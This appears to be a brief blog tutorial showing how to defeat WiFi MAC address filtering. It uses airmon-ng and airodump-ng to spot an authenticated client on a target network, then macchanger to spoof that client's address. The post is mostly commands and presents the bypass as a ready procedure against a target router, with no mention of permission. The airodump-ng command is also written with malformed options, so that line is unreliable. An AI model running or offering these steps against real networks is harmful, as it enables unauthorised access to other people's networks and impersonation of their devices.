Easily bypass MAC address filtering on WiFi

Easily bypass MAC address filtering on WiFi

MAC Address filtering is included in all modern routers and access points. Normally you would think this is a secure way of stopping people connecting to your network?

Using Kali Linux and the Aircrack/Airomon suite it only takes a few second to get around this. Start by launching the airodump utility to see wireless networks in range:

airmon-ng start wlan0
airodump-ng bssid TARGET_MAC_ADDRESS –i wlan0mon

Replace the above TARGET_MAC_ADDRESS with the actual MAC address of the target router. The way this bypass works is that you are looking for another connected client to this network; if you see a client that is authenticated with the network, then you’ve found a valid MAC address that’s allowed.

Once you see a connected client to this network, copy the clients MAC address and change your system to use this address:

airmon-ng stop wlan0mon
ifconfig wlan0 down
macchanger -m CLIENT_MAC_ADDRESS wlan0
ifconfig wlan0 up

Replace the above CLIENT_MAC_ADDRESS with a real MAC address that is connected to the network.

Using this method should bypass the filtering on the router/AP.

Leave a Comment